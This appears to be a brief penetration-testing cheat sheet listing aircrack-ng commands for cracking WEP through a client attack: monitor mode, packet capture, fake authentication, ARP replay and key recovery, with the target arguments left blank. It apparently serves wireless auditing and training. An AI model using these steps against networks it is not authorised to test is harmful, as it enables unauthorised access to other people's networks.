cracking_wep_via_a_client_attack
CRACKING WEP VIA A CLIENT ATTACK
Cracking WEP via a Client Attack
Place your wireless card into monitor mode on the AP channel:
airmon-ng start
Start a capture dump, filtering on the AP channel and BSSID, saving the capture to a file:
airodump-ng -c --bssid -w
Next, conduct a fake authentication against the access point:
aireplay-ng -1 0 -e -a -h
Launch the interactive packet replay attack looking for ARP packets coming from the AP:
aireplay-ng -2 -b -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86
aircrack-ng -z
Last updated
Was this helpful?